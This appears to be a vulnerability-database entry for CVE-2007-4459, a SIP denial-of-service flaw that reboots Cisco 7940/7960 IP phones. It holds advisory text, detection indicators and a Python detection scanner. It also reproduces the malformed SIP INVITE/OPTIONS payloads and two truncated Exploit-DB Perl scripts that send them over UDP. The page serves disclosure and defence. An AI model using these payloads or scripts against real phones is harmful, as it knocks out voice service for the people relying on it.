CVE-2007-4459
Published 2007-08-21
Priority P431 · high · 7.1 (CVSS 2.0) · AV:N/AC:M/Au:N/C:N/I:N/A:C
Exploit available
EPSS 13.99% (96.1th percentile)
Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.
Affected (6 ranges listed; four carry no version data)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | voip_phone_cp-7940 | <= 8.70 | — |
| cisco | voip_phone_cp-7960 | <= 8.70 | — |
Detection & IOCs (extracted from sources)
- command: `INVITE sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n`
- command: `OPTIONS sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n`
- command: `OPTIONS sip:<user>@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP <src>;rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01@<src>\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n`
- command: `INVITE sip:invaliduser@<target> SIP/2.0\r\nVia: SIP/2.0/UDP <src>;branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08@<src>\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286`
- Detect the exploit's characteristic sequence: an INVITE with a tab character (\t) in the Via header followed by OPTIONS messages sharing the same Call-ID, which is the 3-message variant trigger.
- Flag SIP INVITE or OPTIONS messages addressed to 'invaliduser' or using 'invalidURL' as the Request-URI host, as these are explicit exploit markers in the 10-message PoC.
- Alert on multiple SIP INVITE/OPTIONS messages sent in rapid succession (within ~45 seconds) to the same Cisco IP Phone target over UDP, especially when Call-IDs are reused across different transaction types.
- Monitor for SIP INVITE messages whose To: header carries a 'tag=' parameter on an initial request (a tag in To is only valid in responses and re-INVITEs), as seen in the 3-message PoC; this is a malformed-SIP indicator.
- Scope detection to the Voice VLAN; the advisory explicitly states the attacker must have access to the voice VLAN network segment where affected devices reside.
- Only Cisco 7940 and 7960 IP Phones running firmware version 8.6 and prior are vulnerable; firmware version 8.7 contains the fix and is not affected.
- CVE-2007-5583 is a distinct but related vulnerability affecting the same device (Cisco IP Phone 7940 firmware P0S3-08-7-00), triggered specifically by SIP INVITE Request-URIs lacking a username; do not conflate detection signatures for the two CVEs.
- The vulnerability is a state management bug: the phone corrupts its state table when processing the specific SIP message sequence, resulting in a crash and reboot rather than arbitrary code execution.
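Added here to illustrate the detection guidance above (it is not code from the page, Cisco, or any listed source): a small Python scanner that applies the listed indicators, the tab inside Via, a To tag on a dialog-initiating INVITE, the invaliduser/invalidURL markers, and INVITE/OPTIONS requests sharing a Call-ID, to constructed SIP requests. The sample messages, the 10.0.0.5 target address, and the assumption that requests have already been bucketed into one ~45 s window before the call are all constructed for the example.

```python
import re
from collections import defaultdict
# Constructed sample traffic (not a capture): it mirrors the shape of the
# 3-message sequence and the invalidURL marker described on this page.
SAMPLE = [
    "INVITE sip:1001@10.0.0.5 SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:x@192.168.1.2>;tag=00\r\n"
    "To: <sip:1001@10.0.0.5>;tag=00\r\nCall-ID: et@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n",
    "OPTIONS sip:1001@10.0.0.5 SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:x@192.168.1.2>;tag=01\r\n"
    "To: <sip:1001@10.0.0.5>\r\nCall-ID: et@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n",
    "OPTIONS sip:1001@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:x@192.168.1.2>;tag=01\r\n"
    "To: <sip:1001@10.0.0.5>\r\nCall-ID: 01@192.168.1.2\r\nCSeq: 21013 OPTIONS\r\nContent-Length: 0\r\n\r\n",
]

def parse_request(raw):
    """Return (method, request_uri, headers) for a SIP request, else None."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    m = re.match(r"^([A-Z]+) (\S+) SIP/2\.0$", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:               # first value of each header wins
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return m.group(1), m.group(2), headers

def scan_sequence(msgs):
    """Indicators over requests pre-bucketed into one short window (assumed); returns [(index, [indicator, ...]), ...]."""
    methods_by_callid = defaultdict(set)
    findings = []
    for i, msg in enumerate(msgs):
        parsed = parse_request(msg)
        if parsed is None:
            continue
        method, uri, h = parsed
        cid, hits = h.get("call-id", ""), []
        if "\t" in h.get("via", ""):                 # whitespace inside Via
            hits.append("tab_in_via")
        # A To tag belongs only in responses and in-dialog requests; a Call-ID
        # not seen before means this INVITE is dialog-initiating.
        if method == "INVITE" and cid not in methods_by_callid \
                and re.search(r";\s*tag=", h.get("to", "")):
            hits.append("to_tag_on_initial_invite")
        user, _, host = uri.removeprefix("sip:").partition("@")
        if user == "invaliduser" or host.split(":")[0] == "invalidURL":
            hits.append("poc_marker_in_request_uri")
        methods_by_callid[cid].add(method)
        if {"INVITE", "OPTIONS"} <= methods_by_callid[cid]:
            hits.append("callid_reused_across_invite_options")
        findings.append((i, hits))
    return findings
```

Feed it the requests seen from one source toward one phone within the window; any non-empty indicator list on an INVITE/OPTIONS burst is worth an alert on the Voice VLAN.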
CVSS provenance
- NVD (CVSS 2.0): 7.1 HIGH, AV:N/AC:M/Au:N/C:N/I:N/A:C
- Cisco (vendor): 7.1 HIGH
Cisco
Cisco IP Phone Session Initiation Protocol Denial of Service Vulnerability
vendor_cisco · 2007-08-21 · CVSS 7.1 · CVE-2007-4459 [HIGH] · CWE-399
Cisco 7940 and 7960 IP Phones with firmware versions 8.6 and prior contain a vulnerability when handling a series of SIP messages that could allow an attacker on the Voice VLAN to cause the phone to fail and restart.
This vulnerability exists due to insufficient handling of certain sets of malformed SIP messages that are sent to affected devices. An unauthenticated, remote attacker with access to the voice VLAN could exploit this vulnerability by sending a series of malicious SIP messages to an affected device. When a device processes these messages, the device may fail and restart. An exploit could result in a denial of service condition.
Exploit code is available.
Cisco confirmed this vulnerability, and updated s
GHSA
GHSA-r3r7-8q5v-779v
ghsa_unreviewed · 2022-05-01 · CVE-2007-4459 [HIGH] · CWE-20
Description identical to the CVE summary above.
GHSA
GHSA-mp26-cr2x-v76m
ghsa_unreviewed · 2022-05-01 · CVSS 7.1 · CVE-2007-5583 [HIGH] · CWE-119
Cisco IP Phone 7940 with firmware P0S3-08-7-00 allows remote attackers to cause a denial of service ("486 Busy" responses or device reboot) via a sequence of SIP INVITE transactions in which the Request-URI lacks a user name, a different vulnerability than CVE-2007-4459.
No detection rules found.
Exploit-DB
Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service
exploitdb · 2007-08-21 · CVE-2007-4459
---
```perl
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[3]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n";
$socket
```
Exploit-DB
Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service
exploitdb · 2007-08-21 · CVE-2007-4459
---
```perl
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branc
```
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065401.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065402.html
- http://secunia.com/advisories/26547
- http://securityreason.com/securityalert/3042
- http://securitytracker.com/id?1018591
- http://www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtml
- http://www.osvdb.org/36695
- http://www.securityfocus.com/bid/25378
- http://www.vupen.com/english/advisories/2007/2928
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36125